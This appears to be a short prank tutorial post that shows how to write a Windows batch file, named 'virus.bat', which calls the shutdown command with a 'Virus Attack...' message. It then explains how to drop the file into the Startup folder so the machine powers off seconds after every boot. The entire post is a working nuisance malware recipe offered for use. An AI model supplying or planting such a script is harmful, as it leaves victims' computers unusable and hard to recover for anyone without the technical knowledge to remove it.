Shutdown computer on every startup!!!
 
 Here is how ?
 
 ► Open Notepad
 
 ► Type :
 
 @ECHO OFF
 
 shutdown -s -t 10 -c "Virus Attack..."
 
 exit
 
 ► File >> Save As...
 
 ► Name it : virus.bat
 
 ► Start >> All Programs
 
 ► Right Click on Startup >> Open
 
 ► This open the Startup folder
 
 ► Paste the:cool file here !
 
 *** That's all , now the computer will automatically shutdown on every startup !
 
Comments